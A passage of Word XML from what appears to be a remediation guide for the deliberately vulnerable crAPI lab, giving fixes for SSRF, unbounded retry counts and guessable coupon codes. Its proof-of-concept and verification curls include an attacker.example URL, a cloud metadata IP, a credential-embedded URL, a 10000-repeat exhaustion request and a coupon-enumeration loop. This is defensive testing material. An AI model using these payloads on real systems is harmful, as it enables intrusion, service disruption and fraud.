        <w:t xml:space="preserve">Step 2  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure the allowlist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/workshop/crapi/settings.py</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Hosts that contact_mechanic is permitted to call out to.</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Add the real mechanic partners here — never accept arbitrary user-supplied hosts.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ALLOWED_MECHANIC_HOSTS =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"api.partner-mechanic.example",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"mechanic-api.crapi.partners",</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3  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the validator in contact_mechanic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Call validate_mechanic_url() before any outbound request is issued. Return HTTP 400 if it raises UnsafeURLError.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/workshop/crapi/mechanic/views.py</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from .url_validator import validate_mechanic_url, UnsafeURLError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class ContactMechanicView(APIView):</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def post(self, request):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 existing input parsing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raw_url = request.data.get("mechanic_api")</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try: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safe_url = validate_mechanic_url(raw_url)</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except UnsafeURLError as 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Response(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{"message": f"Invalid mechanic_api: {e}", "status": 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status=400,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Use 'safe_url' (not raw_url) in the outbound request,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and never follow redirects to defeat redirect-based bypasses.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resp = requests.post(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safe_url,</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json=payload,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timeout=5,</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allow_redirects=False,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 existing handling ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict outbound egress at the Docker network layer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Defence in depth: configure the workshop-service container to use an egress proxy or a restrictive firewall so it cannot reach internal hosts even if a future code path bypasses the validator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">deploy/docker/docker-compose.yml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services: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crapi-workshop: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Place workshop-service on its own network with no route to the metadata IP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networks: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crapi-internal</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crapi-egress     # only this network has outbound DNS/HTTP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Optional: pin DNS to a resolver under your control:</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dns:</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- 1.1.1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rebuild and verify</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal: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build crapi-workshop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up -d crapi-workshop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BODY='{"mechanic_code":"TRAC_JHN","problem_details":"test","vin":"4AGRNV6392LZ82YUR","repeat_request_if_failed":false,"number_of_repeats":1'</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1. External host (not in allowlist) — must be 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http://localhost:8888/workshop/api/merchant/contact_mechanic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"$BODY,\"mechanic_api\":\"https://attacker.example/probe\"}"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Expected: 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2. Metadata IP — must be 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http://localhost:8888/workshop/api/merchant/contact_mechanic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"$BODY,\"mechanic_api\":\"https://169.254.169.254/latest/meta-data/\"}"</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Expected: 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3. Credential-embedded URL — must be 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http://localhost:8888/workshop/api/merchant/contact_mechanic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"$BODY,\"mechanic_api\":\"https://api.partner-mechanic.example@attacker.example/\"}"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Expected: 400</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="70AD47" w:sz="4"/>
          <w:bottom w:val="single" w:color="70AD47" w:sz="4"/>
          <w:left w:val="single" w:color="70AD47" w:sz="16"/>
          <w:right w:val="single" w:color="70AD47" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="E2EFDA" w:val="clear"/>
        <w:spacing w:after="240" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="385723"/>
        </w:rPr>
        <w:t xml:space="preserve">✔ VERIFY:  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">All three classes of malicious URL (external, internal/metadata, credential-embedded) must return HTTP 400. A request to an allowlisted host must succeed. No outbound traffic from workshop-service to private IP ranges may be observed in network logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-06   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Unbounded number_of_repeats Causes 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Severity</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HIGH</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OWASP Mapping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API4:2023 — Unrestricted Resource Consumption</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Service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workshop-service (Python/Django)</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Endpoint</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POST /workshop/api/merchant/contact_mechanic</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Vulnerable Field</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number_of_repeats</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Pynt Finding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Server returns 5xx (resource exhaustion) when number_of_repeats=10000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">number_of_repeats controls how many times the server retries the outbound mechanic call inside a single request. There is no upper bound and no input-type check, so an authenticated low-privilege caller can pass 10000 (or a string) and exhaust workshop-service workers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept (Pynt)</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-X POST 'http://host.docker.internal:8888/workshop/api/merchant/contact_mechanic'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 "mechanic_code":"TRAC_JHN", "vin":"4AGRNV6392LZ82YUR",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"problem_details":"test", "repeat_request_if_failed":true,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"mechanic_api":"http://host.docker.internal:8888/workshop/api/mechanic/receive_report",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"number_of_repeats": "10000"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5xx after the worker exhausts memory / connection pool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate number_of_repeats in the serializer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Use a DRF serializer with an IntegerField and explicit min/max bounds. This rejects strings, floats, negative numbers and oversized values before any business logic runs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/workshop/crapi/mechanic/serializers.py</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from rest_framework import serializers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MAX_REPEATS = 5   # tune as needed; never accept arbitrary user values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class ContactMechanicSerializer(serializers.Serializer):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mechanic_code            = serializers.CharField(max_length=32)</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problem_details          = serializers.CharField(max_length=500)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vin                      = serializers.RegexField(r"^[A-HJ-NPR-Z0-9]{17}$")</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mechanic_api             = serializers.URLField()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repeat_request_if_failed = serializers.BooleanField(default=False)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number_of_repeats        = serializers.IntegerField(min_value=1, max_value=MAX_REPEATS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the serializer in the view; return 400 on failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/workshop/crapi/mechanic/views.py</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from .serializers import ContactMechanicSerializer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class ContactMechanicView(APIView):</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def post(self, request):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serializer = ContactMechanicSerializer(data=request.data)</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not serializer.is_valid():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Response(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{"message": "Invalid input", "errors": serializer.errors, "status": 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status=400,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data = serializer.validated_data</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 continue with data["number_of_repeats"] etc. ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Move retries to a background task with a hard ceiling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">The current implementation runs all repeats synchronously inside the HTTP request. Replace with a Celery task so the request returns immediately and the worker pool can't be exhausted by long-running retries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/workshop/crapi/mechanic/tasks.py</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from celery import shared_task</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import requests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@shared_task(bind=True, max_retries=5, default_retry_delay=10)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def contact_mechanic_async(self, safe_url, payload, repeats):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repeats = min(repeats, 5)  # belt-and-braces ceiling</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last_exc = None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for _ in range(repeats):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try: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resp = requests.post(safe_url, json=payload, timeout=5,</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allow_redirects=False)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resp.ok:</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resp.json()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last_exc = RuntimeError(f"Mechanic API returned {resp.status_code}")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except requests.RequestException as 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last_exc = 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raise self.retry(exc=last_exc) if last_exc else None</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Add per-user rate limiting on the endpoint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Use DRF's ScopedRateThrottle to cap each user at a reasonable number of contact_mechanic calls per minute.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/workshop/crapi/settings.py</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REST_FRAMEWORK =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 existing config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"DEFAULT_THROTTLE_CLASSES":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"rest_framework.throttling.ScopedRateThrottle",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"DEFAULT_THROTTLE_RATES":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"contact_mechanic": "10/minute",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60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/workshop/crapi/mechanic/views.py</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class ContactMechanicView(APIView):</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throttle_scope = "contact_mechanic"</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 rest as before ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rebuild and verify</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal: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build crapi-workshop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up -d crapi-workshop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BASE='{"mechanic_code":"TRAC_JHN","problem_details":"test","vin":"4AGRNV6392LZ82YUR","mechanic_api":"https://api.partner-mechanic.example/r","repeat_request_if_failed":true'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1. number_of_repeats = 10000 → must be 400, not 5xx</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http://localhost:8888/workshop/api/merchant/contact_mechanic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"$BASE,\"number_of_repeats\":10000}"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Expected: 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2. number_of_repeats = "5" (string) → must be 400 (type rejected)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http://localhost:8888/workshop/api/merchant/contact_mechanic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"$BASE,\"number_of_repeats\":\"5\"}"</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Expected: 400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3. Valid request (1..5) → should accept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 -o /dev/null -w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http://localhost:8888/workshop/api/merchant/contact_mechanic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"$BASE,\"number_of_repeats\":3}"</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Expected: 200 (or 202 if you moved to async)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="70AD47" w:sz="4"/>
          <w:bottom w:val="single" w:color="70AD47" w:sz="4"/>
          <w:left w:val="single" w:color="70AD47" w:sz="16"/>
          <w:right w:val="single" w:color="70AD47" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="E2EFDA" w:val="clear"/>
        <w:spacing w:after="240" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="385723"/>
        </w:rPr>
        <w:t xml:space="preserve">✔ VERIFY:  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">number_of_repeats values above 5 (or whatever MAX_REPEATS is set to) must return HTTP 400. Non-integer types must return HTTP 400. No request to contact_mechanic may cause a 5xx response from oversized inputs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-07   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Guessable Sequential Coupon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Severity</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OWASP Mapping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API8:2023 — Security Misconfiguration</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Service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community-service (Go, MongoDB)</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Endpoint</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POST /community/api/v2/coupon/validate-coupon</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Pynt Finding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TRAC065 redeemable after observing TRAC075 — sequential numeric suffix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Coupon codes follow a TRACnnn pattern and the numeric suffix is monotonically incremented. Observing one valid code lets an attacker enumerate adjacent codes in seconds. Combined with the lack of per-user authorisation on the validation endpoint, this enables unauthorised discount redemption.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept (Pynt)</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for CODE in TRAC060 TRAC061 TRAC062 TRAC063 TRAC064 TRAC065; do</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curl -s -o /dev/null -w "%{http_code} $CODE\n"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'http://host.docker.internal:8888/community/api/v2/coupon/validate-coupon'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"{\"coupon_code\":\"$CODE\"}"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done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multiple 200 responses confirming valid codes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch coupon-code generation to a CSPRNG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace the sequential generator with crypto/rand. The recommended format is 12 base32 characters (≈ 60 bits of entropy) — short enough to share but not enumerable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/community/api/services/coupon_service.go</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import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"crypto/rand"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"encoding/base32"</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"strings"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NewCouponCode returns e.g. "K7QF3LZP9JNX" — 60 bits of entropy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func NewCouponCode() (string, error)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var buf [8]byte                       // 64 random bits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_, err := rand.Read(buf[:]); err != nil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 err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enc := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(buf[:])</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enc = strings.ToUpper(strings.TrimRight(enc,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enc[:12], nil</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2  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Migrate existing coupons to random codes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Rotate every code currently in the database so the previously enumerated codes can't be reused. Email new codes to entitled users out-of-band.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/community/api/migrations/2026_04_22_rotate_coupons.go</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func RotateAllCoupons(ctx context.Context, db *mongo.Database) error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cur, err := db.Collection("coupon").Find(ctx, bson.M{})</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err != nil { return err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defer cur.Close(ctx)</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for cur.Next(ctx)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var doc bson.M</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err := cur.Decode(&amp;doc); err != nil { return err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newCode, err := NewCouponCode()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err != nil { return err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_, err = db.Collection("coupon").UpdateByID(ctx, doc["_id"], bson.M{</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"$set": bson.M{</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"coupon_code":  newCode,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"rotated_at":   time.Now(),</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err != nil { return err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nil</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3  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce per-user authorisation on validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Each coupon should be bound to the user(s) entitled to use it. Reject validation if the authenticated user is not in the entitled set.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/community/api/controllers/couponController.go</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After the existing input validation (VULN-03 fix):</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userEmail := r.Context().Value("user_email").(string)</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var coupon Coupon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err := db.Collection("coupon").FindOne(ctx, bson.M{</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"coupon_code":      req.CouponCode,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"entitled_emails":  userEmail,     // &lt;-- caller must be entitled</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}).Decode(&amp;coupon)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if err == mongo.ErrNoDocuments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http.Error(w, "Coupon not valid for this account", http.StatusForbidden)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4  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rate-limit failed validation attempts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Cap each user/IP to a small number of invalid coupon attempts per minute and alert on bursts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/community/api/middlewares/couponRateLimit.go</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Use golang.org/x/time/rate with a per-IP limiter map.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Hard cap: 5 failed attempts / minute per IP — log and alert on breach.</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var couponLimiters sync.Map  // map[string]*rate.Limiter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func couponLimiterFor(ip string) *rate.Limiter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l, _ := couponLimiters.LoadOrStore(ip,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rate.NewLimiter(rate.Every(12*time.Second), 5))</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l.(*rate.Limiter)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func CouponRateLimit(next http.Handler) http.Handler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http.HandlerFunc(func(w http.ResponseWriter, r *http.Request)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!couponLimiterFor(r.RemoteAddr).Allow()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http.Error(w, "Too many attempts", http.StatusTooManyRequests)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next.ServeHTTP(w, r)</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5  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rebuild and verify</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
